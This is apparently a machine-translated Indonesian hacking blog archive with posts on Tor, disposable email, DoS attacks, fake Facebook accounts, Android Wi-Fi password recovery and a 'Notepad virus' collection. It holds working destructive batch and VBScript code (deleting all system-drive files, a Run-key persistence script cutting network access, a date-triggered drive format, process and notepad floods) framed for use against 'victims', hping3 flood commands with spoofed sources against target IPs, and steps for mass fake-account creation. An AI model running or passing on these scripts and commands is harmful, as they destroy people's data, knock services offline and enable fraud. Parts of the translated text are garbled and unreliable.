Sunday, November 17, 2019

Segalanya Tentang Tor: Apa itu Tor ? Bagaimana Tor Bekerja ?

tor-onion Tor or The Onion Router, memungkinkan penggunaan anonim dari kerudung internet identitas pengguna yang sebenarnya. Ini melindungi pengguna dari setiap analisis lalu lintas dan jaringan mata-mata. Tor mungkin merupakan opsi paling populer dan aman yang tersedia untuk konektivitas internet anonim.

Dari mana asalnya?

Tor didasarkan pada prinsip 'onion routing' yang dikembangkan oleh Paul Syverson, Michael G. Reed dan David Goldschlag di Laboratorium Penelitian Angkatan Laut Amerika Serikat pada 1990-an. Versi alpha Tor bernama 'The Onion Routing Project' atau hanya Proyek TOR dikembangkan oleh Roger Dingledine dan Nick Mathewson, diluncurkan pada 20 September 2002. Pengembangan lebih lanjut dilakukan di bawah atap keuangan Electronic Frontier Foundation (EFF).

Tor Project Inc. adalah organisasi nirlaba yang saat ini mengelola Tor dan bertanggung jawab atas pengembangannya. Ini terutama didanai oleh Pemerintah Amerika Serikat, bantuan lebih lanjut disediakan oleh Pemerintah Swedia dan berbagai LSM & sponsor individu.

Bagaimana itu bekerja?

Tor bekerja pada konsep metode 'onion routing' di mana data pengguna pertama kali dienkripsi, dan kemudian ditransfer melalui berbagai relay yang ada di jaringan Tor, sehingga menciptakan enkripsi berlapis-lapis (lapisan seperti bawang), sehingga menjaga identitas dari pengguna yang aman. Pada setiap relai, satu layer didekripsi dan data yang tersisa diteruskan ke relai acak apa pun hingga mencapai server tujuannya. Untuk server tujuan, relai simpul / keluar Tor terakhir muncul sebagai asal data. Karenanya sangat sulit untuk melacak identitas pengguna atau server oleh sistem pengawasan yang bertindak di tengah jalan.

Selain memberikan anonimitas kepada pengguna mandiri, Tor juga dapat memberikan anonimitas ke situs web dan server yang masuk dalam kategori layanan tersembunyi. Selain itu, aplikasi P2P seperti Bittorrent dapat dikonfigurasi untuk menggunakan jaringan dan mengunduh file torrent.

Kontroversi dan Pengaruh:


Tor telah dipuja karena anonimitas dan privasi yang diberikannya kepada pengguna yang ingin memintas sensor, yang dilecehkan dan trauma oleh penguntit dan aktivis sosial yang takut ditangkap oleh pihak berwenang. Ini telah digunakan oleh agen keamanan yang berbeda untuk berbagi informasi rahasia.

Edward Snowden, Whistle Blower, menggunakan Tor untuk membocorkan informasi tentang PRISM kepada The Guardian dan The Washington Post.

Tor telah dikritik karena alasan itu bertindak sebagai media untuk berbagai kegiatan ilegal seperti pelanggaran data, perdagangan narkoba, perjudian dll. Tor juga digunakan oleh orang jahat untuk berkomunikasi melalui internet sambil menjaga identitas mereka disembunyikan yang membuat sulit bagi agen keamanan untuk melacak mereka.

Badan Keamanan Nasional AS (NSA) telah menyebut Tor "raja anonimitas Internet dengan keamanan tinggi, latensi rendah" dan komentar serupa oleh majalah BusinessWeek, "mungkin cara yang paling efektif untuk mengalahkan upaya pengawasan online agen intelijen di seluruh dunia ”

Spekulasi lain yang dibuat adalah bahwa Tor mengambil dana dari Pemerintah AS yang dapat mengarah pada asumsi bahwa NSA mungkin telah mengkompromikan identitas masing-masing pengguna Tor, tetapi direktur eksekutif Andrew Lewman telah menolak setiap konfederasi dengan NSA.

Bisakah itu dikompromikan?

Berbagai klaim telah dibuat untuk mengkompromikan anonimitas dan keamanan Tor dari waktu ke waktu. Yang paling terkenal adalah Bad Apple Attack di mana para peneliti mengklaim telah mengidentifikasi sekitar 10 ribu alamat IP pengguna Bittorrent aktif yang terhubung melalui Tor.

Kompromi terkenal lainnya dilakukan oleh bug Heartbleed pada bulan April 2014 yang menghentikan jaringan Tor selama beberapa hari.

Fingerprinting Lalu Lintas adalah metode yang digunakan untuk menganalisis lalu lintas web dengan menganalisis pola, respons, dan paket dalam arah tertentu. Ini dapat digunakan untuk menyerang jaringan Tor dengan menjadikan komputer penyerang bertindak sebagai penjaga.
Kerentanan utama yang ditemukan adalah pada titik keluarnya di mana tingkat keamanan sangat rendah dibandingkan dengan sisa jaringan Tor.

Produk berdasarkan Tor:


Tor Project Inc. telah merilis Tor Browser yang merupakan modifikasi dari versi Extended Support Release dari browser Mozilla Firefox. Browser ini dibuat portabel sehingga dapat digunakan dari media eksternal dan mengurangi bahaya instalasi. Ini menghapus riwayat pengguna setelah setiap kali digunakan, sehingga mengurangi risiko segala jenis pelacakan cookie.

Produk lain seperti Orbot - versi Android Tor, Orfox - versi seluler Tor Browser dikembangkan oleh The Guardian Project yang merupakan komunitas pengembang global yang didirikan oleh Nathan Freitas.

Kita dapat mengatur aplikasi berbasis SOCKS (Socket Secure) untuk menggunakan jaringan Tor dengan mengonfigurasinya dengan alamat loop-back.
 
Alternatif Tor:

Hornet adalah jaringan anonimitas baru yang memberikan kecepatan jaringan lebih tinggi dibandingkan dengan Tor. I2P, Tails, SubgraphOS, Freenet dan Freepto adalah alternatif teratas lainnya yang dapat digunakan.
 
Berakhir:

Tor telah terbukti menjadi media hebat untuk keberadaan web yang aman, aman, dan anonim yang dapat diberikan kepada pengguna tanpa biaya. Meskipun tersedia untuk niat positif, tetapi juga digunakan oleh orang-orang ganas dalam memenuhi kebutuhan mereka. Proyek Tor telah mengarah pada pendekatan optimis terhadap sensor dan internet tanpa pengawasan.

Untuk ide lebih lanjut tentang 'Bagaimana Tor bekerja', silakan lihat videonya:

Situs Peretas Terbaik Di Dark Net

Cara Mengakses Deep Web atau DarkNet


Web yang dalam bukan lokasi tunggal, tetapi seluruh kelas dari lokasi yang berbeda yang memiliki satu kesamaan - bahwa mereka disembunyikan dari mesin pencari dan pengguna internet biasa. Karena itu, area berbeda dari web yang dalam memiliki persyaratan berbeda agar Anda dapat mengaksesnya, dan teknologi apa pun yang Anda gunakan hanya akan memberi Anda akses ke area spesifik dari internet yang tersembunyi. Karena itu, ada sejumlah kecil teknologi yang digunakan untuk membuat apa yang secara populer disebut 'web dalam' atau 'darknet', dan satu khususnya yang digunakan sebagian besar orang - TOR.

Situs Peretasan Terbaik di The Dark Net: -

Bagaimana Seperti Peretas dan Apa yang Mereka Pikirkan ?

Hampir semua peretas menyelesaikan kuliah atau mencapai tingkat itu dengan belajar sendiri. Peretas yang belajar sendiri lebih dihormati di komunitas peretas karena orang itu benar-benar tertarik pada peretasan dan dia melewati banyak hal yang tidak diajarkan di sekolah dan kampus.

Hal yang paling umum dilakukan peretas adalah teknik elektro komputer, fisika, matematika, linguistik dan filsafat. Namun, seperti setiap pengembang bukan hacker, peretas tidak selalu memiliki keterampilan pemrograman, tetapi seseorang dari mereka memilikinya.

Gaya pakaian: Peretas berpakaian sederhana, santai: jeans, T-shirt dan sepatu. T-shirt biasanya dengan beberapa slogan lucu. Pada tahun 1990, mereka mendistribusikan T-shirt dengan citra komputer, tetapi ketika budaya hacker akhirnya mengembangkan simbol mereka sendiri, hari ini ada T-shirt dengan gambar Penguin (merek dagang Linux) atau daemon (BSD). Sejumlah kecil peretas lebih suka sepatu hiking. Setelah 1995, peretas jatuh di bawah pengaruh subkultur punk, gothic dan rave. Ini tercermin dari pemakaian baju hitam. Peretas lebih peduli pada kenyamanan, kepraktisan, dan kemudahan perawatan pakaian. Mereka membenci pakaian bisnis.

BUNGA LAIN: Hobi yang dilakukan peretas tersebar luas. Kebanyakan mereka menyukai fiksi ilmiah, musik, abad pertengahan, catur, permainan perang, dan permainan intelektual dari semua jenis, teka-teki logis, dan bidang lain yang terkait erat dengan peretasan atau yang mencakup linguistik dan akting.

Peretas lebih suka kucing daripada anjing. (Dipercaya secara luas bahwa kucing memiliki sifat peretas). Sejumlah besar peretas selalu lupa mencuci mobil. Mereka lebih suka Porsche modern kaya atau RX-7, tetapi mereka lupa untuk mencuci. Semua peretas memiliki tulisan tangan yang mengerikan .

Terganggu oleh orang-orang bodoh, tidak suka mendengarkan musik lembut, atau menonton televisi, kecuali kartun dan film fiksi ilmiah. Mereka membenci kebohongan, ketidakmampuan dan kebosanan.

AKTIVITAS DAN OLAHRAGA: Jumlah terbesar peretas pada umumnya tidak terlibat dalam kegiatan fisik. Di antara mereka yang berlatih, minat dalam olahraga tidak besar. Hindari olahraga tim. Olahraga peretas selalu bersifat individu, termasuk konsentrasi dan kemampuan: bersepeda, balap mobil, skating, berlayar, hiking, meluncur ... Hanya untuk menyebutkan, tim HaCoder bermain sepak bola dan sepak bola gaya bebas, tetapi tidak suka menontonnya di TV.

Sebagian besar peretas tidak menggunakan rokok dan alkohol. Pada tahun 1995, ada kecenderungan untuk minum bir eksotis, dipengaruhi oleh Linus Torvalds yang menyukai Guinness. Terbatasnya penggunaan kanabis, LSD, Nitrus oksida sekali lagi diterima. Di sisi lain mereka tidak suka menggunakan obat-obatan karena kerusakan otak. Kebanyakan peretas menggunakan kopi dan / atau gula atau soda (Coke) untuk tetap terjaga sepanjang malam selama peretasan.

cara membuat email dalam hitungan detik


gunakan situs web paling keren ini..jika kamu membutuhkan email palsu..untuk keperluan apa pun !!! .. kamu bisa melanjutkan itu dan kamu akan mendapatkan email palsu kamu di sana .. !!!

di sini ada tautan: -

http://10minutemail.com/
https://emkei.cz/

www. fakemail generator.com/

http: //www.throwaway mail .com /

en.email-fake.com/

www. kotak masuk palsu.com/

https://mailinator.com/

mati palsu .com /

mail drop.cc/

http://www.anony mail er.net/

https://www.guerrillamail.com/

klik saja tautan ini;) ... dan Anda akan mendapatkan email Anda ... tetapi beberapa dari mereka hanya untuk 10 menit ... jadi jangan gunakan email ini untuk tujuan administrasi seperti di sekolah, kolase, kantor dll.

Nikmati :)

Saturday, November 16, 2019

Apa itu serangan DOS dan cara Meretas menggunakan DOS



Kawan, Anda mungkin pernah melihat Tn. Robot dan mengingat peristiwa ketika Masyarakat menggunakan DDoS sebagai kartu panggil untuk memikat Elliot agar membantu mereka menurunkan E-Corp atau Anda mungkin dikejutkan dalam situasi ketika Anda mencoba membuka Website hanya untuk lihat pemberitahuan bahwa Situs web sedang down. Apa ini? Ya, ini adalah Serangan DOS.

Serangan denial of service (DoS) adalah serangan yang menyumbat begitu banyak memori pada sistem target sehingga tidak dapat melayani penggunanya, atau menyebabkan sistem target macet, reboot, atau menolak layanan untuk pengguna yang sah. Ada beberapa jenis serangan dos seperti yang dibahas di bawah ini: -

1) Ping Of Death : - Ping of death attack mengirimkan ICMP oversized datagrams (dikemas dalam paket IP) kepada korban. Perintah Ping memanfaatkan permintaan gema ICMP dan gema pesan balasan dan biasanya digunakan untuk menentukan apakah host jarak jauh hidup. Namun, dalam ping serangan kematian, ping menyebabkan sistem jarak jauh hang, reboot atau crash. Untuk melakukannya, penyerang menggunakan, perintah ping bersamaan dengan argumen -l (digunakan untuk menentukan ukuran paket yang dikirim) untuk melakukan ping ke sistem target yang melebihi byte maksimum yang diizinkan oleh TCP / IP (65.536).
contoh: - c: /> ping -l 65540 nama host
Untungnya, hampir semua sistem operasi saat ini tidak rentan terhadap serangan ping kematian.

2) Teardrop Attack : - Setiap kali data dikirim melalui internet, ia dipecah menjadi beberapa bagian di sistem sumber dan dipasang kembali di sistem tujuan. Misalnya, Anda perlu mengirim 3.000 byte data dari satu sistem ke sistem lainnya

3) SYN - Flood Attack: - Dalam serangan flooding SYN, beberapa paket SYN dikirim ke host target, semua dengan alamat IP sumber tidak valid. Ketika sistem target menerima paket-paket SYN ini, ia mencoba untuk menanggapi masing-masing dengan paket SYN / ACK tetapi karena semua alamat IP sumber tidak valid, sistem target masuk ke keadaan menunggu untuk pesan ACK untuk menerima dari sumber. Akhirnya, karena sejumlah besar permintaan koneksi, memori sistem target dikonsumsi . Untuk benar-benar mempengaruhi sistem target, sejumlah besar paket SYN dengan alamat IP yang tidak valid harus dikirim.

4) Serangan Tanah : - Serangan darat mirip dengan serangan SYN, satu-satunya perbedaan adalah bahwa alih-alih memasukkan alamat IP yang tidak valid, paket SYN termasuk alamat IP dari sistem target itu sendiri. Akibatnya, infinite loop dibuat di dalam sistem target, yang akhirnya hang dan crash. Windows NT sebelum Paket Layanan 4 rentan terhadap serangan ini.

5) Smurf Attack : - Ada 3 pemain dalam serangan smurf - penyerang, perantara (yang juga bisa menjadi korban) dan korban. Dalam sebagian besar skenario, penyerang memalsukan alamat sumber IP sebagai IP korban yang dituju untuk alamat penyiaran jaringan perantara. Setiap host di jaringan perantara membalas, membanjiri korban dan jaringan perantara dengan lalu lintas jaringan.
Hasil: - Performa dapat menurun sehingga korban, korban dan jaringan perantara menjadi macet dan tidak dapat digunakan, yaitu menyumbat jaringan dan mencegah pengguna yang sah mendapatkan layanan jaringan.

Serangan DOS

6) UDP - Flood Attack : - Dua layanan UDP: gema (yang menggemakan kembali semua karakter yang diterima) dan chargen (yang menghasilkan karakter) digunakan di masa lalu untuk pengujian jaringan dan diaktifkan secara default pada sebagian besar sistem. Layanan ini dapat digunakan untuk meluncurkan serangan DOS dengan menghubungkan chargen ke port echo pada mesin yang sama atau yang lain dan menghasilkan sejumlah besar lalu lintas jaringan .

Distributed Denial Of Service (DDoS):


Dalam serangan DoS Terdistribusi, ada 100 atau lebih penyerang (sistem) yang berbeda menyerang sistem tunggal. Karena jumlah penyerang yang lebih tinggi, serangan DDoS lebih efektif dan berbahaya daripada serangan DoS biasa. Para penyerang memiliki kontrol atas zombie induk, yang, pada gilirannya, memiliki kontrol atas zombie budak, seperti yang ditunjukkan pada gambar.

Tidak ada sistem yang terhubung ke internet aman dari serangan DDoS. Semua platform, termasuk Unix dan Windows NT, rentan terhadap serangan semacam itu. Bahkan mesin Mac OS telah digunakan untuk melakukan serangan DDoS.

Alat serangan DDoS dan dos yang paling populer adalah: -

a) Trin00 (WinTrinoo)
b) Tribe Flood Network (TFN) (TFN2k)
c) Shaft
d) LOIC(LOW ORBIT ION CANNON)
e) XOIC

Tidak ada perangkat lunak, Anda ingin mencobanya sendiri, Anda dapat menggunakan HPING (telah diinstal sebelumnya dalam KALI LINUX).

ATAU

Unduh hping dari www. hping .org

Langkah-langkah untuk meretas menggunakan serangan DOS:


Buka konsol dan pergi ke jalan hping3 dan berikan perintah berikut.

hping3 –merek sumber –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (set nilai dengan mengganti 0) dengan sumber acak.

hping3 –merek sumber –SA –p <port terbuka> <target IP>

Di sini kami mengirim paket SYN + ACK dari sumber acak.

hping3 –merek sumber-–udp <target IP> –flood

Membanjiri IP target dengan paket UDP.

hping3 –merek sumber –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirim paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Membanjiri paket ICMP dengan spoofed IP (–spoof).

Buka konsol dan pergi ke jalan hping3 dan berikan perintah berikut.

hping3 –merek sumber –S –L 0 –p <target port> <target IP>

Di sini kami mengirim paket SYN (set nilai dengan mengganti 0) dengan sumber acak.

hping3 –merek sumber –SA –p <port terbuka> <target IP>

Di sini kami mengirim paket SYN + ACK dari sumber acak.

hping3 –merek sumber-–udp <target IP> –flood

Membanjiri IP target dengan paket UDP.

hping3 –merek sumber –SAFRU –L 0 –M 0 –p <port> <target> –flood

Dalam perintah ini, kami mengirim paket SYN + ACK + FIN + RST + URG dengan TCP ack (-L) dan TCP seq (-M). Ubah nilai setelah -L dan -M.

hping3 –icmp –spoof –flood

Membanjiri paket ICMP dengan spoofed IP (–spoof).

Friday, November 15, 2019

Cara Memutar Video YouTube Lebih Cepat Tanpa Buffering

youtube super cepat


Hari ini ada jutaan orang yang menghabiskan waktu mereka di youtube menonton video online . Dan seperti yang kita semua ketahui, YouTube adalah jaringan streaming video terbesar di mana Anda tidak diragukan lagi dapat menonton semua video kesayangan Anda secara online. Namun masalah utama dengan video youtube adalah kecepatan buffering mereka.

Hari ini kita akan berbagi trik tentang Buffering video Youtube Anda lebih cepat daripada kecepatan standar. Pergi melalui pos lengkap untuk mengetahui lebih banyak tentang hal itu.

Jadi untuk menyimpulkan masalah ini, saya di sini tentang metode untuk buffer video youtube lebih cepat dari kecepatan standar. Sebenarnya, buffering ini tidak tergantung secara eksklusif pada kecepatan internet karena pasti ada lebih banyak hal yang dapat mempengaruhinya. Jadi dengan metode di bawah ini Anda dapat menyelesaikannya dan dapat menyangga video youtube lebih cepat.

Di bawah ini adalah metode untuk menonton video youtube lebih cepat Ikuti langkah-langkah di bawah ini untuk melanjutkan:


Langkah 1. Pertama-tama unduh dan instal ekstensi SmartVideo untuk YouTube di Google chrome atau Mozilla Firefox Anda . Saya akan menunjukkan kepada Anda tutorial lengkap tentang Google Chrome karena banyak dari kita kebanyakan lebih suka Google chrome.

Langkah 2. Sekarang setelah instalasi memutar video apa pun di YouTube dan kemudian Anda akan dapat melihat beberapa opsi tambahan di bawah video yang diputar. Anda hanya perlu memindahkan kursor Mouse Anda di antara video youtube dan Anda dapat melihat sebuah kotak persegi panjang muncul.

Langkah 3. Sekarang klik pada Preferensi Global di sisi kanan video Anda, Kemudian centang kotak Smart Buffer Box. Anda tidak perlu melakukan hal lain di sini.

Langkah 4. Sekarang, itu akan memaksa buffer video YouTube Anda . Itu dia! Anda akan melihat video youtube Anda akan buffer lebih cepat dan menikmati pengalaman streaming video berkecepatan tinggi melalui youtube.

Jadi di atas adalah semua tentang Cara Buffer Youtube Video Faster . Dengan metode ini, Anda dapat dengan mudah meningkatkan memori buffer dan memaksa youtube untuk mengirim data lebih lanjut di ruang buffer Anda dan Anda akan dapat menonton video youtube lebih cepat dari kecepatan normal. Jadi nikmati pengalaman streaming video yang lebih baik dengan metode ini.

Trik Membuat Akun Facebook Terverifikasi Tidak Terbatas

Langkah 1: Pertama, buka http://m.facebook.com dan kemudian klik "Buat Akun Baru"

Langkah 2: Isi formulir lengkap (gunakan http://fakenamegenerator.com/ )


Di bagian “Email atau Telepon” gunakan email dari http://10minutemail.com/

Langkah 3: Tekan "Daftar" dan kemudian kunjungi http://10minutemail.com/ untuk mendapatkan verifikasi email dari Facebook (Tekan F5 sampai Anda melihatnya) gunakan KODE itu untuk mengaktifkan akun Anda.

CATATAN: Akun Anda mungkin dicekal dalam sehari, jadi pastikan Anda memberikan identitas yang sesuai (perguruan tinggi, sekolah, tempat tinggal ...) dan jangan lupa mengunggah foto profil untuk menjaga masa pakai akun Anda lebih lama .

Wednesday, November 13, 2019

Cara Mengubah Layar Boot di PC Windows Anda



Untuk pengguna windows, kami di sini Cara Mengganti Layar Boot di PC Windows Anda . Saat booting di PC windows Anda, Anda melihat proses memuat windows default yang dengan layar boot windows default. Namun tampilan layarnya cukup membosankan karena menonton layar yang sama berulang-ulang tidak keren. Tapi ini bisa diubah, ya adalah mungkin untuk mengubah layar Boot Anda dan Anda dapat menggantinya dengan yang sangat keren yang Anda ingin miliki. Jadi, lanjutkan dengan panduan lengkap di bawah ini.

Cara Mengubah Layar Boot di PC Windows Anda


Metode ini sangat sederhana dan dapat dilakukan dengan menggunakan satu jendela tweak yang akan mengubah file layar boot default Anda dan menggantinya dengan yang sangat keren yang pasti akan Anda sukai alih-alih membosankan. Jadi, lanjutkan dengan langkah-langkah di bawah ini.

Langkah-langkah Untuk Menyesuaikan Layar Boot Di Windows


  1. Pertama-tama Anda perlu membuat cadangan file sistem layar boot windows Anda untuk itu pergi ke My Computer > C: / > Windows > System32 .
  2. Sekarang di sana Anda akan melihat salin file ntoskrnl.exe dan tempel file di lokasi lain dari komputer Anda.
  3. Sekarang unduh dan instal Resource Hacker di komputer Anda.
  4. Sekarang setelah mengunduh dan menginstal, luncurkan alat di PC windows Anda 11
  5. Sekarang dalam program klik pada File dan kemudian pilih opsi Open dan kemudian cari file ntoskrnl.exe .
  6. Sekarang ketika file dibuka klik pada tombol Action di sana dan kemudian pilih ganti opsi Bitmap.
  7. Sekarang pilih salah satu layar yang Anda inginkan dan kemudian klik tombol OK .
  8. Sekarang klik pada tombol File dan kemudian pilih opsi Simpan Sebagai .
  9. Dan sekarang simpan file tersebut sebagai ntoskrnl.exe .
  10. Sekarang, matikan PC Anda dan kemudian mulai dalam mode Aman.
  11. Sekarang salin file ntoskrnl.exe yang Anda buat dan rekatkan ke C: / > Windows > System32 . 22
  12. Sekarang restart komputer Anda dalam mode normal.
  13. Itu sudah selesai, dengan ini layar boot Anda diubah dengan gambar yang luar biasa yang telah Anda pilih.

Jadi di atas adalah semua tentang Cara Mengubah Layar Boot di PC Windows Anda . Dengan ini, Anda dapat dengan mudah mendapatkan tampilan baru di windows Anda dan dapat menyingkirkan tampilan default yang Anda tidak ingin kembali lagi setelah windows keren ini mengubah. Semoga Anda menyukai ini, bagikan ini juga dengan orang lain. Tinggalkan komentar di bawah jika Anda memiliki pertanyaan terkait dengan ini.

Cara Meretas Command Prompt di sekolah untuk mengubah kata sandi dan banyak lagi

Mencoba fokus mempelajari akhir Stats di perpustakaan tetapi mendapatkan mantra ADD serius? Kemudian manfaatkan waktu Anda - sambil bersenang-senang dengan siapa pun yang ada di perpustakaan - dengan meretas command prompt komputer Anda. Command prompt adalah sistem operasi paling dasar yang dijalankan oleh komputer Anda, dan video ini akan mengajarkan Anda cara untuk mematikan komputer teman Anda atau bahkan mendapatkan dan mengubah kata sandi administrator.

Sunday, November 10, 2019

Pulihkan Kata Sandi WiFi Menggunakan Android



Ketika perangkat mana pun terhubung ke jaringan wifi maka kata sandi wifi disimpan dalam perangkat itu untuk sementara waktu sampai perangkat itu tetap terhubung ke jaringan itu. Dan di Android, kata sandi wifi ini disimpan dalam file sistem yang tidak dapat diakses langsung ke perangkat Anda tanpa memiliki akses root pada perangkat Android Anda. Jadi dalam panduan ini, kita akan membahas hal yang sama dengan mana Anda dapat dengan mudah memulihkan kata sandi jaringan wifi yang Anda lupa. Satu-satunya persyaratan adalah bahwa Android Anda harus terhubung ke jaringan wifi di masa lalu.

Di sini kami telah menyatakan dua aplikasi android keren yang hanya bekerja dengan android yang di-rooting dan dengan itu, Anda benar-benar dapat mengekstrak semua kata sandi yang disimpan di perangkat Anda ketika terhubung ke jaringan wifi. Jadi ikuti beberapa langkah sederhana di bawah ini untuk melanjutkan. Metode ketiga tidak memerlukan perangkat android yang di-rooting.

# 1 Menggunakan Pemulihan Kunci WiFi:


Langkah 1. Pertama-tama, Anda perlu me-rooting android Anda karena aplikasi hanya akan berfungsi jika Anda memiliki akses rooting ke perangkat Anda, jadi kunjungi panduan Root semua android dengan aman .


Langkah 2. Setelah melakukan rooting, unduh perangkat Anda dan instal aplikasi Wifi Key Recovery di android Anda

Langkah 3. Sekarang buka aplikasi dan Anda akan melihat popup tentang izin akses pengguna super memberikan izin.








Langkah 4. Sekarang Anda akan melihat semua jaringan wifi yang Anda sambungkan ke perangkat Android Anda dan kata sandi mereka juga.

Langkah 5. Sekarang cukup salin kata sandi dan dapatkan login ke wifi itu dan kata sandinya akan dipulihkan dan Anda sekarang bahkan dapat mengubah kata sandi jaringan itu dengan mengunjungi panel admin jaringan.

# 2 Menggunakan Aplikasi Pemulihan Kata Sandi Wifi


Langkah 1. Pertama-tama, Anda perlu mengunduh Wifi Password Recovery App di ponsel pintar Android Anda yang sudah di-root. 



Langkah 2. Setelah Anda menginstalnya di perangkat android Anda, pada langkah selanjutnya Anda harus memberikan Izin Root .




Langkah 3. Sekarang Anda dapat melihat semua kata sandi wifi tersimpan Anda terdaftar dengan SSID Name and Pass . Jika Anda ingin menyalin kata sandi cukup ketuk pada jaringan dan kemudian pilih " Salin kata sandi ke clipboard"

Itu saja sudah selesai! ini adalah cara termudah untuk mengetahui kata sandi wifi yang tersimpan di ponsel pintar android Anda.

# 3 Menggunakan ES File Explorer


Langkah 1. Pertama-tama, Anda memerlukan file explorer yang memberi Anda akses baca ke folder root . Jika Manajer file default Anda tidak memberi Anda akses baca ke folder root maka Anda dapat menginstal ES File Explorer.

Sekarang Anda perlu menuju ke folder data / misc / wifi dan Anda akan menemukan file bernama wpa_supplicant.conf.

Langkah 2. Anda perlu membuka file dan pastikan Anda menggunakan penampil teks / HTML bawaan ES File Explorer untuk tugas tersebut. Sekarang dalam file ini, Anda akan dapat melihat SSID jaringan dan kata sandi mereka di sebelahnya.

Sekarang Anda perlu mencatat nama jaringan dan kata sandinya . Dengan cara ini, Anda dapat melihat semua kata sandi wifi yang tersimpan di perangkat android.

Catatan: Harap jangan mengedit apa pun di wpa_supplicant.conf karena dapat mengubah perangkat Anda berfungsi atau itu akan memiliki efek konektivitas wifi Anda.

Jadi cukup pulihkan kata sandi WiFi Anda menggunakan trik ini. Semoga Anda menyukai metode keren ini, berbagi juga dengan orang lain.

Thursday, November 7, 2019

Virus Notepad



IMP. Catatan >> Saya tidak bertanggung jawab atas kerusakan atau kesalahan pelaporan di komputer Anda yang melakukannya sebagai risiko Anda sendiri. Pengodean ini hanya untuk konsep pengetahuan.

Semua Skrip Di Sini Akan Disalin Dalam Note Pad

>> Virus Ini Menghapus Semua Konten Drive ...
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Simpan Kode Di Atas dalam file .bat

>> Nonaktifkan Internet Secara Permanen
Save As A bat File

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE



>> Virus Paling Sederhana Untuk Menghancurkan Jendela
@Echo off
Del C:\ *.* |y

Save It As Anything.bat

>> Ini Akan Menghancurkan Komputer Anda
Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject(“Wscript.Shell”)

Dim x
For x = 1 to 100000000
WSHShell.Run “Tourstart.exe”
Next


Save It As Anything.vbs

Ini Hanya Bekerja Dengan Windows XP

>> Notes Tanpa Batas

* Ini akan memunculkan notes yang tidak berujung hingga komputer macet dan macet *

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


>> Bom Virus
Salin Tempel Yang Berikut
 
If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


Dan Simpan Ini Sebagai Apa Pun

Catatan: - Anda Dapat Mengubah Tanggal (2009/11/25) Dari Virus Dan Lokasi (format E:) Yang Di Kerjanya
Virus Akan Berlaku Pada Hari Itu

>> Kunci topi gila

* Ini terus-menerus mengaktifkan dan menonaktifkan kunci caps sangat cepat terus menerus *

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop


>> Masuk Tanpa Batas

* Ini terus-menerus membuatnya sehingga tombol enter ditekan terus-menerus *

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


>> Backspace Tanpa Akhir

* Ini membuatnya jadi tombol backspace terus ditekan *

Code:-

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop


Apa jenis kelamin komputer Anda?

-> buka notepad
-> menyalin kode

CreateObject ("SAPI.SpVoice"). Bicaralah "I love YOU"

-> n tempel di Notepad
-> simpan sebagai> love.vbs
-> klik dua kali di atasnya

Jadikan Keyboard Anda Disco Light

Trik ini hanya membuat lampu keyboard Anda disko.
Script yang saya bagikan dengan Anda, ketika dieksekusi membuat flash light Caps, Num dan Scroll Lock Anda dengan cara berirama keren!

1. Bagian kode ini menjadikan keyboard Anda disko langsung ..

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
wshshell.sendkeys “{NUMLOCK}”
wshshell.sendkeys “{SCROLLLOCK}”
loop


2. Yang ini membuatnya tampak seperti rantai cahaya ....

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 200
wshshell.sendkeys “{CAPSLOCK}”
wscript.sleep 100
wshshell.sendkeys “{NUMLOCK}”
wscript.sleep 50
wshshell.sendkeys “{SCROLLLOCK}”
loop


Instruksi:
* rekatkan salah satu dari dua kode di atas dalam notepad
* Simpan sebagai "AnyFileName" .vbs
* Jalankan file
* Untuk berhenti, buka task manager dan kemudian di bawah "Proses" dan "wscript.exe"

Saya harap kamu akan menyukainya .. 😉

>> Tugas Membunuh

@echo off

start calc

tskill msnmsgr

tskill firefox

tskill iexplore

tskill LimreWire

tskill explorer

tskill explorer

tskill explorer

tskill explorer

tskill explorer

pause


simpan ini sebagai file .bat dan kirim dan hancurkan korban & k! ll Operasikan! ng systeM!

>> Ketikkan kode di notepad
@echo off
shutdown -r -f -t 00

Form Of Switches

-s
Shuts down the PC.

-l
Logs off the current user.

-t nn

Menunjukkan durasi penundaan, dalam detik, sebelum melakukan tindakan.

-c “messagetext”

Menampilkan pesan di jendela System Shutdown. Maksimal 127 karakter dapat digunakan. Pesan harus dilampirkan dalam tanda kutip.

-f
Memaksa semua aplikasi yang berjalan untuk dimatikan.

-r
Reboot PC. .. !! ..!

>> Menggerakkan Drive CD

* Ini akan membuat CD drive terus-menerus keluar *

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop


>> Untuk membuat bicara pc Anda

Buka file teks di notepad dan tulis:

Dim msg, sapi
msg=InputBox(“Enter your text”,”Talk it”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak msg

Simpan file dengan ekstensi (* .vbs), itu akan membuat File VBScript.
